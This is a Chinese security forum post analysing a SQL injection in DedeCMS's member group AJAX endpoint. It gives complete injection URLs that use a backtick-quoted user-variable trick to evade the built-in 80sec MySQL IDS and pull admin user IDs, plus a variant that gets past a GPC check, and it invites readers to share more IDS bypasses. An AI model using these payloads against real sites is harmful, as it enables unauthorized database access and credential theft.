自从知道dedecms自带了80sec的内置Mysqlids后,一直以来也没有想到绕过的办法。或者是自己mysql的根底太差了吧。于是分析dedecms源码时,只找模板执行,本地包含,上传等,完全没有想到注入存在的可能性了。
可以看看某牛的很久以前的分析

http://www.oldjun.com/blog/index.php/archives/66/(其中:80sec的内置Mysqlids可能的绕过方法)

之前也看过,感觉也是同意的。

但今天看到dede再暴漏洞,居然存在注入?

文章在这里:http://www.sa666.com/thread-25247-1-1.html

注入关键地方:/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'`

最终执行语句是:

SELECT groupname FROM dede_member_group WHERE mid = 0 AND id=@`\'`
Union select userid from `dede_admin` where 1 or id=@`\'` LIMIT 0,1;

关键是:@`'`  这个

一直以为 反引号 只用于字段表等特殊地方,但没想到还可以用于值的,于是就顺理绕过了IDS的检测,在IDS中变成:select
groupname from dede_member_group where mid = 0 and id=@`\$s$` limit 0,1。

如果执行:select * from table where id=`8` 会出错。

但执行:select * from table where id=@`8` 即正常,但没查出数据。

即这个值“@`8`”不是简单的值 8 那是什么值呢?

mysql> select @`8`;

+------+

| @`8` |

+------+

| NULL |

+------+

1 row in set (0.00 sec)

据我所知,这个@是由用户声明的局部变量。估计就是把整个值当为整个变量吧?

不知想法对不对。有对mysql了解的可以来解释一下。

至于有人说为什么会有些出现:Safe Alert: Request Error step 2!

这是由于dedecms的另一个问题了,这里就不多说,和GPC有关,可以下面语句绕过:

/member/ajax_membergroup.php?action=post&membergroup=@`\'` Union select userid from `%23@__admin` where 1 or id=@`\'`

IDS的防和绕过一直在斗争着。

在Discuz! 中,IDS也起到了很大作用,从前面的 /*!*/ 绕过和 union all等绕过,到现在的修复。

大家还有什么IDS的绕过技巧或案例可以分享的么?^-^

摘自:http://zone.wooyun.org/content/108

05-11 20:54